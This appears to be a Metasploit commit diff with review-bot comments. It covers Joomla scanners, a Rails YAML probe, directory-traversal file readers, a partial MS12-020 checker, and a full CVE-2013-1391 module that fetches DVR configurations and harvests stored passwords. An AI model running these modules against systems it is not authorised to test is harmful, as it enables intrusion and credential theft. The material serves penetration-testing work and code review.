@ -60,8 +60,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'uri' => uri,
'method' => 'GET'})
if not res
@ -91,8 +93,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Retrieving the SiteScope Configuration")
uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APISiteScopeImpl",
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,


@ -59,8 +59,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Connecting to SiteScope SOAP Interface")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APIMonitorImpl",
'uri' => uri,
'method' => 'GET'})
if not res
@ -95,8 +97,10 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{@peer} - Retrieving the file contents")
uri = normalize_uri(@uri, 'services/APIMonitorImpl')
res = send_request_cgi({
'uri' => "#{@uri}services/APIMonitorImpl",
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,


@ -81,7 +81,7 @@ class Metasploit4 < Msf::Auxiliary
begin
res = send_request_cgi(
{
'uri' => path,
'uri' => normalize_uri(path),
'method' => 'PUT',
'ctype' => 'text/plain',
'data' => data,
@ -102,7 +102,7 @@ class Metasploit4 < Msf::Auxiliary
begin
res = send_request_cgi(
{
'uri' => path,
'uri' => normalize_uri(path),
'method' => 'DELETE',
'ctype' => 'text/html',
}, 20
@ -119,7 +119,7 @@ class Metasploit4 < Msf::Auxiliary
# Main function for the module, duh!
#
def run_host(ip)
path = normalize_uri(datastore['PATH'])
path = datastore['PATH']
data = datastore['FILEDATA']
if path[-1,1] != '/'
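Review bot: `path = datastore['PATH']` no longer goes through `normalize_uri`, so the `path[-1,1]` check on the next line raises NoMethodError when the option is unset, whereas the previous form always yielded a String; `path = datastore['PATH'].to_s` keeps the guard safe (if PATH is a required option this cannot happen today, but the method should not depend on it). Moving `normalize_uri(path)` to the two `send_request_cgi` calls is the right place to normalise, since the trailing-slash logic below needs the raw value. `run_host` continues outside the hunk.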


@ -0,0 +1,109 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Page Scanner',
'Description' => %q{
This module scans a Joomla install for common pages.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
pages = [
'robots.txt',
'administrator/index.php',
'admin/',
'index.php/using-joomla/extensions/components/users-component/registration-form',
'index.php/component/users/?view=registration',
'htaccess.txt'
]
vprint_status("#{peer} - Checking for interesting pages")
pages.each do |page|
scan_pages(tpath, page, ip)
end
end
def scan_pages(tpath, page, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{page}",
'method' => 'GET',
})
return if not res or not res.body or not res.code
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
note = "Page Found"
if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
note = "Administrator Login Page"
elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
note = "Registration Page"
end
print_good("#{peer} - #{note}: #{tpath}#{page}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "#{note}: #{tpath}#{page}",
:update => :unique_data
)
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end
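Review bot: The character class in `res.body.gsub!(/[\r|\n]/, ' ')` contains a literal `|`, so pipe characters in the body are replaced as well; the intent is `/[\r\n]/`. The same pattern appears twice in the Joomla plugins scanner added in this commit (in `run_host` and `plugin_search`). Several 403 messages interpolate `#{ip}` twice (`"#{ip} denied access to #{ip} (SSL Required)"`) where the rest of the module uses `#{peer}`, and `:port => datastore['RPORT']` in `report_note` could be `rport` for the same consistency. The guard `return if not res or not res.body or not res.code` reads better as `return unless res && res.body && res.code`.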


@ -0,0 +1,175 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Plugins Scanner',
'Description' => %q{
This module scans a Joomla install for plugins and potential
vulnerabilities.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
vprint_status("#{peer} - Checking for interesting plugins")
res = send_request_cgi({
'uri' => tpath,
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
File.open(datastore['PLUGINS'], 'rb').each_line do |line|
papp = line.chomp
plugin_search(tpath, papp, ip, res.body.size)
end
end
def plugin_search(tpath, papp, ip, osize)
res = send_request_cgi({
'uri' => "#{tpath}#{papp}",
'method' => 'GET'
})
return if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
nsize = res.body.size
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
report_note(
:host => ip,
:port => rport,
:proto => 'http',
:ntype => 'joomla_plugin',
:data => "#{tpath}#{papp}",
:update => :unique_data
)
if (papp =~/passwd/ and res.body =~/root/)
print_good("#{peer} - Vulnerability: Potential LFI")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'root' signature",
:risk => 1,
:confidence => 10,
:category => 'Local File Inclusion',
:description => "Joomla: Potential LFI at #{tpath}#{papp}",
:name => 'Local File Inclusion'
)
elsif (res.body =~/SQL syntax/)
print_good("#{peer} - Vulnerability: Potential SQL Injection")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the 'SQL syntax' signature",
:risk => 1,
:confidence => 10,
:category => 'SQL Injection',
:description => "Joomla: Potential SQLI at #{tpath}#{papp}",
:name => 'SQL Injection'
)
elsif (papp =~/>alert/ and res.body =~/>alert/)
print_good("#{peer} - Vulnerability: Potential XSS")
report_web_vuln(
:host => ip,
:port => rport,
:vhost => vhost,
:ssl => ssl,
:path => tpath,
:method => "GET",
:pname => "",
:proof => "Response with code #{res.code} contains the '>alert' signature",
:risk => 1,
:confidence => 10,
:category => 'Cross Site Scripting',
:description => "Joomla: Potential XSS at #{tpath}#{papp}",
:name => 'Cross Site Scripting'
)
elsif (papp =~/com_/)
vars = papp.split('_')
pages = vars[1].gsub('/','')
res1 = send_request_cgi({
'uri' => "#{tpath}index.php?option=com_#{pages}",
'method' => 'GET'
})
if (res1.code == 200)
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_page',
:data => "Page: #{tpath}index.php?option=com_#{pages}",
:update => :unique_data
)
else
vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response")
end
end
elsif (res.code == 403)
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif (res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
end
end
return
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return
end
end
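Review bot: `File.open(datastore['PLUGINS'], 'rb').each_line` opens the wordlist without a block and never closes it, leaking a descriptor per scanned host; `File.foreach(datastore['PLUGINS']) do |line|` closes it for you. In `plugin_search`, `res1.code` is read without checking that the `com_` follow-up `send_request_cgi` returned a response, so a timeout there raises NoMethodError, which none of the method-level `rescue` clauses cover; add `return if res1.nil?` as is already done for `res`. `vars[1].gsub('/','')` assumes the wordlist entry has text after the underscore; an entry of just `com_` makes `vars[1]` nil and raises the same NoMethodError, so `return unless vars[1]` (or `papp.split('_', 2).last`) is needed before it.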


@ -0,0 +1,174 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
# Joomscan and various MSF modules for code examples.
def initialize
super(
'Name' => 'Joomla Version Scanner',
'Description' => %q{
This module scans a Joomla install for information about the underlying
operating system and Joomla version.
},
'Author' => [ 'newpid0' ],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
], self.class)
end
def peer
return "#{rhost}:#{rport}"
end
def os_fingerprint(response)
if not response.headers.has_key?('Server')
return "Unkown OS (No Server Header)"
end
case response.headers['Server']
when /Win32/, /\(Windows/, /IIS/
os = "Windows"
when /Apache\//
os = "*Nix"
else
os = "Unknown Server Header Reporting: "+response.headers['Server']
end
return os
end
def fingerprint(response)
case response.body
when /<version.*\/?>(.+)<\/version\/?>/i
v = $1
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/,
/MooTools\.More\=\{version\:\"1\.3\.0\.1\"/,
/en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/,
/en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/,
/20196 2011\-01\-09 02\:40\:25Z ian/
out = "1.6"
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /,
/MooTools\.More\=\{version\:\"1\.3\.2\.1\"/,
/22183 2011\-09\-30 09\:04\:32Z infograf768/,
/21660 2011\-06\-23 13\:25\:32Z infograf768/
out = "1.7"
when /Joomla! 1.5/,
/MooTools\=\{version\:\'1\.12\'\}/,
/11391 2009\-01\-04 13\:35\:50Z ian/
out = "1.5"
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/,
/MooTools.More\=\{version\:\"1\.4\.0\.1\"/
out = "2.5"
when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/
out = $1.split(/,/)[0]
when /(Copyright \(C\) 2005 - 200(6|7))/,
/47 2005\-09\-15 02\:55\:27Z rhuk/,
/423 2005\-10\-09 18\:23\:50Z stingrey/,
/1005 2005\-11\-13 17\:33\:59Z stingrey/,
/1570 2005\-12\-29 05\:53\:33Z eddieajau/,
/2368 2006\-02\-14 17\:40\:02Z stingrey/,
/4085 2006\-06\-21 16\:03\:54Z stingrey/,
/4756 2006\-08\-25 16\:07\:11Z stingrey/,
/5973 2006\-12\-11 01\:26\:33Z robs/,
/5975 2006\-12\-11 01\:26\:33Z robs/
out = "1.0"
else
out = 'Unknown Joomla'
end
return out
end
def check_file(tpath, file, ip)
res = send_request_cgi({
'uri' => "#{tpath}#{file}",
'method' => 'GET'
})
return :abort if res.nil?
res.body.gsub!(/[\r|\n]/, ' ')
if (res.code == 200)
os = os_fingerprint(res)
out = fingerprint(res)
return false if not out
if(out =~ /Unknown Joomla/)
print_error("#{peer} - Unable to identify Joomla Version with #{file}")
return false
else
print_good("#{peer} - Joomla Version:#{out} from: #{file} ")
print_good("#{peer} - OS: #{os}")
report_note(
:host => ip,
:port => datastore['RPORT'],
:proto => 'http',
:ntype => 'joomla_version',
:data => out
)
return true
end
elsif (res.code == 403)
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
vprint_status("#{ip} restricted access by IP")
elsif(res.body =~ /SSL client certificate is required/)
vprint_status("#{ip} requires a SSL client certificate")
else
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
end
return :abort
end
return false
rescue OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL error")
return :abort
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
vprint_error("#{peer} - Unable to Connect")
return :abort
rescue ::Timeout::Error, ::Errno::EPIPE
vprint_error("#{peer} - Timeout error")
return :abort
end
def run_host(ip)
tpath = normalize_uri(target_uri.path)
if tpath[-1,1] != '/'
tpath += '/'
end
files = [
'language/en-GB/en-GB.xml',
'templates/system/css/system.css',
'media/system/js/mootools-more.js',
'language/en-GB/en-GB.ini',
'htaccess.txt',
'language/en-GB/en-GB.com_media.ini'
]
vprint_status("#{peer} - Checking Joomla version")
files.each do |file|
joomla_found = check_file(tpath, file, ip)
return if joomla_found == :abort
break if joomla_found
end
end
end
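Review bot: The body normalisation in check_file, `res.body.gsub!(/[\r|\n]/, ' ')`, is a character class, so the `|` is a literal and every pipe character in the page is replaced with a space as well; the intended form is `res.body.gsub!(/[\r\n]/, ' ')`. None of the fingerprint signatures contain a pipe today, so this is latent, but the Keywords branch captures `(.*)` from the page and would record a mangled string. Minor: `"Unkown OS"` in os_fingerprint is a typo, and `return false if not out` in check_file is dead code because fingerprint always returns a String.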


@ -19,7 +19,10 @@ class Metasploit3 < Msf::Auxiliary
This module attempts to identify Ruby on Rails instances vulnerable to
an arbitrary object instantiation flaw in the XML request processor.
},
'Author' => 'hdm',
'Author' => [
'hdm', #author
'jjarmoc' #improvements
],
'License' => MSF_LICENSE,
'References' =>
[
@ -29,7 +32,8 @@ class Metasploit3 < Msf::Auxiliary
))
register_options([
OptString.new('URIPATH', [true, "The URI to test", "/"])
OptString.new('URIPATH', [true, "The URI to test", "/"]),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST', 'PUT'] ]),
], self.class)
end
@ -37,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary
odata = %Q^<?xml version="1.0" encoding="UTF-8"?>\n<probe type="#{ptype}"><![CDATA[\n#{pdata}\n]]></probe>^
res = send_request_cgi({
'uri' => datastore['URIPATH'] || "/",
'method' => 'POST',
'method' => datastore['HTTP_METHOD'],
'ctype' => 'application/xml',
'data' => odata
}, 25)
@ -46,29 +50,35 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res1 = send_probe("string", "hello")
res2 = send_probe("yaml", "--- !ruby/object:Time {}\n")
res3 = send_probe("yaml", "--- !ruby/object:\x00")
unless res1
vprint_status("#{rhost}:#{rport} No reply to the initial XML request")
return
end
if res1.code.to_s =~ /^[5]/
vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
return
end
res2 = send_probe("yaml", "--- !ruby/object:Time {}\n")
unless res2
vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe")
return
end
res3 = send_probe("yaml", "--- !ruby/object:\x00")
unless res3
vprint_status("#{rhost}:#{rport} No reply to the second YAML probe")
return
end
if res1.code.to_s =~ /^[45]/
vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH")
end
vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}")
if res2.code.to_s =~ /^[23]/ and res3.code != res2.code and res3.code != 200
if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)
print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML")
report_vuln({
:host => rhost,
@ -79,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
:refs => self.references
})
else
vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set")
vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set")
end
end
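Review bot: With the early `return` on a 5xx baseline dropped, the positive branch `(res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)` will flag a host whose baseline XML probe already fails, e.g. res1 = res2 = 500 plus a 400 from a front-end that rejects the NUL byte in the third probe, which is not evidence of YAML deserialisation. If continuing past a 4xx/5xx baseline was deliberate, exclude a server error from the verdict, `if res1.code.to_s !~ /^5/ and (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)`, or restore the old return. The send_probe definition starts outside the hunk.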


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
uri = normalize_uri(target_uri.path)
uri = target_uri.path
uri << '/' if uri[-1, 1] != '/'
t = "/.." * datastore['DEPTH']
@ -52,9 +52,10 @@ class Metasploit3 < Msf::Auxiliary
print_status("Retrieving #{datastore['FILE']}")
# No permission to access.log or proc/self/environ, so this is all we do :-/
uri = normalize_uri(uri, 'index.php')
res = send_request_raw({
'method' => 'GET',
'uri' => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00"
'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00"
})
if not res


@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
begin
res = send_request_raw({
'uri' => normalize_uri(datastore['URI']) + "/services/Session",
'uri' => normalize_uri(datastore['URI'], "/services/Session"),
'method' => 'POST',
'data' => data,
'headers' =>


@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
'method' => 'GET'
}, 25)
return if not res


@ -43,7 +43,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
res = send_request_cgi({
'uri' => normalize_uri(datastore['URI']) + "/services/listServices",
'uri' => normalize_uri(datastore['URI'], "/services/listServices"),
'method' => 'GET'
}, 25)
return if not res or res.code != 200


@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary
return :skip_user
when /Invalid password/
vprint_status("#{@peer} - Username found: #{user}")
else /\<a href="process.php\?logout=1"\>/
else /\<a href="process\.php\?logout=1"\>/
print_good("#{@peer} - Successful login: \"#{user}:#{pass}\"")
report_auth_info({
:host => rhost,
@ -108,7 +108,7 @@ class Metasploit3 < Msf::Auxiliary
end
def run
@uri = normalize_uri(target_uri)
@uri = normalize_uri(target_uri.path)
@uri.path << "/" if @uri.path[-1, 1] != "/"
@peer = "#{rhost}:#{rport}"
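Review bot: `else /\<a href="process\.php\?logout=1"\>/` in the first hunk is a `case` `else` followed by a bare regexp literal that is evaluated and discarded, so every response that does not match the earlier `when` arms is reported as a successful login via report_auth_info; the commit only fixed the escaping. It should read `when /\<a href="process\.php\?logout=1"\>/` with a separate `else` that prints the unexpected response and returns. In the second hunk, `@uri = normalize_uri(target_uri.path)` yields a String if normalize_uri behaves as it does elsewhere in this commit (it is used to build request paths), in which case `@uri.path << "/"` on the next line raises NoMethodError; confirm, and if so keep the URI object (`@uri = target_uri`) as another module in this commit does.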


@ -39,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
Opt::RPORT(9084),
OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']),
OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']),
OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini'])
], self.class)
end
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
def run_host(ip)
fname = File.basename(datastore['FILE'])
traversal = ".\\..\\..\\..\\..\\..\\..\\..\\"
uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE']
uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']
print_status("#{rhost}:#{rport} - Requesting: #{uri}")
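Review bot: Dropping the `'/'` join in `normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE']` makes the request depend on URIPATH ending in a slash, and the same change removes the trailing-slash hint from the option description; with `URIPATH=/vci/downloads` the path becomes `/vci/downloads.\..\..`, which no longer names the directory. Passing the traversal as a second argument, `normalize_uri(datastore['URIPATH'], traversal + datastore['FILE'])`, lets normalize_uri insert the separator, assuming it joins on `/` and leaves backslashes alone as its other uses in this commit suggest.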


@ -0,0 +1,222 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Multiple DVR Manufacturers Configuration Disclosure',
'Description' => %q{
This module takes advantage of an authentication bypass vulnerability at the
web interface of multiple manufacturers DVR systems, which allows to retrieve the
device configuration.
},
'Author' =>
[
'Alejandro Ramos', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-1391' ],
[ 'URL', 'http://www.securitybydefault.com/2013/01/12000-grabadores-de-video-expuestos-en.html' ]
],
'License' => MSF_LICENSE
)
end
def get_pppoe_credentials(conf)
user = ""
password = ""
enabled = ""
if conf =~ /PPPOE_EN=(\d)/
enabled = $1
end
return if enabled == "0"
if conf =~ /PPPOE_USER=(.*)/
user = $1
end
if conf =~ /PPPOE_PASSWORD=(.*)/
password = $1
end
if user.empty? or password.empty?
return
end
info = "PPPOE credentials for #{rhost}, user: #{user}, password: #{password}"
report_note({
:host => rhost,
:data => info,
:type => "dvr.pppoe.conf",
:sname => 'pppoe',
:update => :unique_data
})
end
def get_ddns_credentials(conf)
hostname = ""
user = ""
password = ""
enabled = ""
if conf =~ /DDNS_EN=(\d)/
enabled = $1
end
return if enabled == "0"
if conf =~ /DDNS_HOSTNAME=(.*)/
hostname = $1
end
if conf =~ /DDNS_USER=(.*)/
user = $1
end
if conf =~ /DDNS_PASSWORD=(.*)/
password = $1
end
if hostname.empty?
return
end
info = "DDNS credentials for #{hostname}, user: #{user}, password: #{password}"
report_note({
:host => rhost,
:data => info,
:type => "dvr.ddns.conf",
:sname => 'ddns',
:update => :unique_data
})
end
def get_ftp_credentials(conf)
server = ""
user = ""
password = ""
port = ""
if conf =~ /FTP_SERVER=(.*)/
server = $1
end
if conf =~ /FTP_USER=(.*)/
user = $1
end
if conf =~ /FTP_PASSWORD=(.*)/
password = $1
end
if conf =~ /FTP_PORT=(.*)/
port = $1
end
if server.empty?
return
end
report_auth_info({
:host => server,
:port => port,
:sname => 'ftp',
:duplicate_ok => false,
:user => user,
:pass => password
})
end
def get_dvr_credentials(conf)
conf.scan(/USER(\d+)_USERNAME/).each { |match|
user = ""
password = ""
active = ""
user_id = match[0]
if conf =~ /USER#{user_id}_LOGIN=(.*)/
active = $1
end
if conf =~ /USER#{user_id}_USERNAME=(.*)/
user = $1
end
if conf =~ /USER#{user_id}_PASSWORD=(.*)/
password = $1
end
if active == "0"
user_active = false
else
user_active = true
end
report_auth_info({
:host => rhost,
:port => rport,
:sname => 'dvr',
:duplicate_ok => false,
:user => user,
:pass => password,
:active => user_active
})
}
end
def run_host(ip)
res = send_request_cgi({
'uri' => '/DVR.cfg',
'method' => 'GET'
})
if not res or res.code != 200 or res.body.empty? or res.body !~ /CAMERA/
vprint_error("#{rhost}:#{rport} - DVR configuration not found")
return
end
p = store_loot("dvr.configuration", "text/plain", rhost, res.body, "DVR.cfg")
vprint_good("#{rhost}:#{rport} - DVR configuration stored in #{p}")
conf = res.body
get_ftp_credentials(conf)
get_dvr_credentials(conf)
get_ddns_credentials(conf)
get_pppoe_credentials(conf)
dvr_name = ""
if res.body =~ /DVR_NAME=(.*)/
dvr_name = $1
end
report_service(:host => rhost, :port => rport, :sname => 'dvr', :info => "DVR NAME: #{dvr_name}")
print_good("#{rhost}:#{rport} DVR #{dvr_name} found")
end
end
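Review bot: Every credential regex in this file captures with `(.*)`, which stops at `\n` but keeps a trailing `\r`, so on a CRLF-formatted DVR.cfg the stored FTP/DDNS/PPPoE/DVR passwords and the FTP port carry a stray carriage return; apply `.strip` to each capture (`user = $1.strip`) or end the patterns with `(.*?)\r?$`. get_ftp_credentials also passes `:port => port` as a String and `:host => server`, which is whatever the device has configured and is often a hostname rather than an address; convert the port with `.to_i` and confirm report_auth_info accepts a non-IP host before relying on that entry. The PPPoE and DDNS secrets go to report_note rather than report_auth_info, so they will not appear in creds output; if that is intentional a one-line comment saying why would help.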


@ -67,6 +67,7 @@ class Metasploit3 < Msf::Auxiliary
end
offset = 0
l0, l1, l2 = data[offset, 3].unpack('CCC')
return false if data.length < 3
length = l0 | (l1 << 8) | (l2 << 16)
# Read a bad amount of data
return if length != (data.length - 4)
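Review bot: The new guard `return false if data.length < 3` sits after `l0, l1, l2 = data[offset, 3].unpack('CCC')`, so short input is sliced before it is checked; move it above the unpack (unpack does not raise on a short string, so this is ordering and clarity rather than a crash, but the guard reads as if it protected that line). It also returns `false` where the existing guard two lines below returns `nil`; use one convention so callers can test the result uniformly. The enclosing method starts and ends outside the hunk.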


@ -0,0 +1,178 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'MS12-020 Microsoft Remote Desktop Checker',
'Description' => %q{
This module checks a range of hosts for the MS12-020 vulnerability.
This does not cause a DoS on the target.
},
'References' =>
[
[ 'CVE', '2012-0002' ],
[ 'MSB', 'MS12-020' ],
[ 'URL', 'http://technet.microsoft.com/en-us/security/bulletin/ms12-020' ],
[ 'EDB', '18606' ],
[ 'URL', 'https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse' ]
],
'Author' =>
[
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>'
],
'License' => MSF_LICENSE
))
register_options(
[
OptInt.new('RPORT', [ true, 'Remote port running RDP', '3389' ])
], self.class)
end
def check_rdp
# code to check if RDP is open or not
vprint_status("#{peer} Verifying RDP protocol...")
# send connection
sock.put(connection_request)
# read packet to see if its rdp
res = sock.get_once(-1, 5)
# return true if this matches our vulnerable response
( res and res == "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" )
end
def report_goods
report_vuln(
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => self.name,
:info => 'Response indicates a missing patch',
:refs => self.references
)
end
def connection_request
"\x03\x00" + # TPKT Header version 03, reserved 0
"\x00\x0b" + # Length
"\x06" + # X.224 Data TPDU length
"\xe0" + # X.224 Type (Connection request)
"\x00\x00" + # dst reference
"\x00\x00" + # src reference
"\x00" # class and options
end
def connect_initial
"\x03\x00\x00\x65" + # TPKT Header
"\x02\xf0\x80" + # Data TPDU, EOT
"\x7f\x65\x5b" + # Connect-Initial
"\x04\x01\x01" + # callingDomainSelector
"\x04\x01\x01" + # callingDomainSelector
"\x01\x01\xff" + # upwardFlag
"\x30\x19" + # targetParams + size
"\x02\x01\x22" + # maxChannelIds
"\x02\x01\x20" + # maxUserIds
"\x02\x01\x00" + # maxTokenIds
"\x02\x01\x01" + # numPriorities
